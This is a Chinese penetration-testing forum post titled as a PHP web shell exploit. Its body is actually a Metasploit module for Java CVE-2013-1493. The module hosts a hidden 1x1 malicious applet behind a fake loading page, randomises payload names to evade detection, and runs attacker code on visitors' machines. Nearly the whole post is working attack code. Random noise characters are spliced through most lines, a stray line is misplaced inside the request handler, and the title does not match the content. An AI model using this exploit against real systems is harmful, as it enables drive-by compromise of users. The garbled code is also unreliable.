中国网络渗透测试联盟

标题: STUNSHELL PHP Web Shell远程执行代码 [打印本页]

---

作者: admin    时间: 2013-4-4 17:31
标题: STUNSHELL PHP Web Shell远程执行代码
##

# This file is part of the Metasploit Framework and may be subject to
- u  G! a6 a, |8 u- R6 z3 n' h) F# redistribution and commercial restrictions. Please see the Metasploit
% F/ l) ~4 n* T$ {# web site for more information on licensing and terms of use.
% u+ Y* i3 ~% U; Z' x/ x: x# http://metasploit.com/
##
# N- b. ~/ N2 [/ H& f6 |5 yrequire ‘msf/core’
require ‘rex’
class Metasploit3 < Msf::Exploit::Remote
) q. \( T# }2 IRank = NormalRanking
: X: C; N& |9 j! O) O+ A9 L: p9 Sinclude Msf::Exploit::Remote::HttpServer::HTML
" K* c: ]7 A. E- c4 c+ rinclude Msf::Exploit::EXE
# U! K% F: u3 |include Msf::Exploit::Remote::BrowserAutopwn
autopwn_info({ :javascript => false })
def initialize( info = {} )
super( update_info( info,
‘Name’ => ‘Java CMM Remote Code Execution’,
% W( k# k/ H3 H‘Description’ => %q{
This module abuses the Color Management classes from a Java Applet to run
' m" V5 }1 T4 a0 l. ^7 m4 r8 Tarbitrary Java code outside of the sandbox as exploited in the wild in February
5 i% h& B2 f; dand March of 2013. The vulnerability affects Java version 7u15 and earlier and 6u41
and earlier and has been tested successfully on Windows XP SP3 and Windows 7 SP1
( t! R" j1 z. f# \* t" T, p! {systems. This exploit doesn’t bypass click-to-play, so the user must accept the java
1 V, X1 Q$ O4 s9 D! U. twarning in order to run the malicious applet.
},
8 W" s) w! `5 ^( X% n1 a) T+ R‘License’ => MSF_LICENSE,
4 W5 {; N4 {3 C‘Author’ =>
! b. _  ^" W. k; w'Unknown', # Vulnerability discovery and Exploit
'juan vazquez' # Metasploit module (just ported the published exploit)
+ Q# c' w  T. \) [],
9 K4 |# t! }" O, w0 ~7 W) P( a. i8 F‘References’ =>
: Y  h  O, o8 g[
[ 'CVE', '2013-1493' ],
[ 'OSVDB', '90737' ],
0 L3 I, v* B9 u2 M/ D$ w1 c[ 'BID', '58238' ],
[ 'URL', 'https://blogs.oracle.com/security/entry/security_alert_cve_2013_1493' ],
[ 'URL', 'http://www.oracle.com/technetwork/topics/security/alert-cve-2013-1493-1915081.html' ],
  f% h9 z, h/ G, h, h, c1 V% ~[ 'URL', 'http://pastie.org/pastes/6581034' ]
. w5 \& V+ n+ O" I; l3 B],
% k1 m1 ^! Z1 v8 d+ Q8 R8 M5 S‘Platform’ => [ 'win', 'java' ],
  k) G' r# r/ _' ?& M0 L# m‘Payload’ => { ‘Space’ => 20480, ‘BadChars’ => ”, ‘DisableNops’ => true },
+ p7 S) m, M6 E9 o9 M‘Targets’ =>
; p7 a( e! R" B$ k1 _6 {[
, ?: }3 j4 d/ M% r4 |[ 'Generic (Java Payload)',
{
9 _8 [6 \3 C% G  m6 X: x) K! `, n'Platform' => 'java',
( z' o$ ?8 [) [9 P. ]6 m3 H; n. @'Arch' => ARCH_JAVA
. T! X7 @5 x; Q. k/ r1 d}
],
[ 'Windows x86 (Native Payload)',
{
- o* i6 z) D; @4 U, [5 e'Platform' => 'win',
8 @# R: j* `* V5 N% x5 U'Arch' => ARCH_X86
}
  |- ~* _+ _; F% g6 j]
+ G. @  W# y, z2 T  ]],
‘‘DisclosureDate’ => ‘Mar 01 2013′
))
  @& c# U+ @8 g7 [4 u) k* Bend
def setup
; N- r7 d$ z9 A3 _/ n4 m  Opath = File.join(Msf::Config.install_root, “data”, “exploits”, “cve-2013-1493″, “Init.class”)
@init_class = File.open(path, “rb”) {|fd| fd.read(fd.stat.size) }
5 q6 [2 z7 I$ T& g% J6 ?& ~' opath = File.join(Msf::Config.install_root, “data”, “exploits”, “cve-2013-1493″, “Leak.class”)
. U9 B1 O( |$ `$ n% N$ ~" V" c" _@leak_class = File.open(path, “rb”) {|fd| fd.read(fd.stat.size) }
/ c: q9 m; T9 _9 O) d) Bpath = File.join(Msf::Config.install_root, “data”, “exploits”, “cve-2013-1493″, “MyBufferedImage.class”)
9 f9 _1 d  W! E@buffered_image_class = File.open(path, “rb”) {|fd| fd.read(fd.stat.size) }
path = File.join(Msf::Config.install_root, “data”, “exploits”, “cve-2013-1493″, “MyColorSpace.class”)
; B% E# L) |) V, I2 M@color_space_class = File.open(path, “rb”) {|fd| fd.read(fd.stat.size) }
# O9 M% L& m# ?! B" \@init_class_name = rand_text_alpha(“Init”.length)
0 ^+ O- x' b* w- g% L# J: j* y" S@init_class.gsub!(“Init”, @init_class_name)
super
end
def on_request_uri(cli, request)
& _  H, C/ C" t: ?6 i4 Gprint_status(“handling request for #{request.uri}”)
+ f4 h0 z0 o, |5 b$ N) Z8 b5 x% Ecase request.uri
when /\.jar$/i
jar = payload.encoded_jar
jar.add_file(“#{@init_class_name}.class”, @init_class)
jar.add_file(“Leak.class”, @leak_class)
jar.add_file(“MyBufferedImage.class”, @buffered_image_class)
. D1 w4 {9 [, n) B8 s% N! O6 ajar.add_file(“MyColorSpace.class”, @color_space_class)
DefaultTarget’ => 1,
metasploit_str = rand_text_alpha(“metasploit”.length)
/ l; Y) B* B1 A1 y* G" gpayload_str = rand_text_alpha(“payload”.length)
jar.entries.each { |entry|
entry.name.gsub!(“metasploit”, metasploit_str)
entry.name.gsub!(“Payload”, payload_str)
entry.data = entry.data.gsub(“metasploit”, metasploit_str)
) C4 c1 K4 U; E: {- P/ q' Rentry.data = entry.data.gsub(“Payload”, payload_str)
4 x% F2 e) j& ]2 l3 s8 A$ \}
jar.build_manifest
send_response(cli, jar, { ‘Content-Type’ => “application/octet-stream” })
0 x4 n' E9 D) C- @# Zwhen /\/$/
7 W$ G3 d% |& E' U; O, ]9 P$ ppayload = regenerate_payload(cli)
if not payload
print_error(“Failed to generate the payload.”)
/ x: T  `# Y5 x1 c( r  Jsend_not_found(cli)
return
. D/ F' z8 M6 N' K0 oend
( N9 b5 z( }9 o: u) I# d* {send_response_html(cli, generate_html, { ‘Content-Type’ => ‘text/html’ })
else
& n. @( j& @: _6 @2 ksend_redirect(cli, get_resource() + ‘/’, ”)
3 }9 P; p' u  a. g" E" Vend
end
) J" Z  i2 y- h- Zdef generate_html
4 O' U. u" J0 Shtml = %Q|<html><head><title>Loading, Please Wait…</title></head>|
html += %Q|<body><center><p>Loading, Please Wait…</p></center>|
$ I$ i7 h( s8 M$ s) Rhtml += %Q|<applet archive=”#{rand_text_alpha(8)}.jar” code=”#{@init_class_name}.class” width=”1″ height=”1″>|
html += %Q|</applet></body></html>|
return html
end
end
end

---

欢迎光临 中国网络渗透测试联盟 (https://www.cobjon.com/)

Powered by Discuz! X3.2